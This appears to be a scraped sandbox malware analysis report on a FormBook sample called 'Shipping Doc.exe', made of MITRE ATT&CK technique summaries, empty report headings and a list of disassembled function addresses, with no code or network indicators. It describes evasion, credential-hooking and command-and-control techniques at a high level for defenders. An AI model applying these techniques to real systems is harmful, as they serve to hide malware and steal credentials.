Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Shipping Doc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00419D5B, Relevance: 1.5, APIs: 1, Instructions: 42
filenativeCOMMON

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 00409A90, Relevance: .1, Instructions: 92
COMMON

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 004082B6, Relevance: 1.6, APIs: 1, Instructions: 54
threadwindowCOMMON

Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Function 0041A062, Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00409E40, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Function 0041D360, Relevance: .4, Instructions: 370
COMMONCrypto

Function 0041E1B3, Relevance: .2, Instructions: 167
COMMONCrypto

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Function 00402D87, Relevance: .2, Instructions: 163
COMMONCrypto

Function 0041DAB4, Relevance: .1, Instructions: 140
COMMONCrypto

Function 00401030, Relevance: .1, Instructions: 108
COMMONCrypto

Function 00407AFB, Relevance: .0, Instructions: 15
COMMON